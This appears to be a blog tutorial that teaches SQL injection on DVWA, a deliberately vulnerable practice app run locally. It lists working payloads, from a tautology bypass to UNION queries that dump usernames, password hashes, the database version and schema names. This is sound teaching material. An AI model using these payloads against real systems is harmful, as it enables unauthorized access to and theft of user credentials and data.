SQL Injection using DVWA

SQL Injection using DVWA

SQL injection happens when user input is directly inserted into SQL query without validation. Here are the steps to practical on DVWA utility.

  1. Open DVWA http://localhost/dvwa
  2. Login
  3. Go to DVWA Security
  4. Set: Security Level → Low
  5. Click Submit

Now go to:

DVWA → SQL Injection

What this page does

You’ll see:

User ID: [  ]
[Submit]

It runs a query like:

SELECT first_name, last_name FROM users WHERE user_id = '$id';

Since input is not sanitized → injectable.

Normal query

Enter:

1

You’ll see:

ID: 1
First name: admin
Surname: admin

3. Basic SQL Injection

Enter:

1' OR '1'='1

Result:
👉 All users displayed

Why?

Query becomes:

SELECT first_name,last_name FROM users 
WHERE user_id='1' OR '1'='1';

1=1 is always true → DB returns all rows.

4. Dump all users

Enter:

' OR 1=1 #

or

' OR 1=1 --

You’ll see full user table.\

5. UNION attack

Enter:

1' UNION SELECT user,password FROM users #

Now DVWA will show:

  • usernames
  • password hashes

Students get shocked here

6. Dump database version

1' UNION SELECT @@version, database() #

Shows:

  • MySQL version
  • DB name

7. Dump table names

1' UNION SELECT table_name, null 
FROM information_schema.tables #

8. Dump column names

1' UNION SELECT column_name, null 
FROM information_schema.columns 
WHERE table_name='users' #

Leave a Reply

Your email address will not be published. Required fields are marked *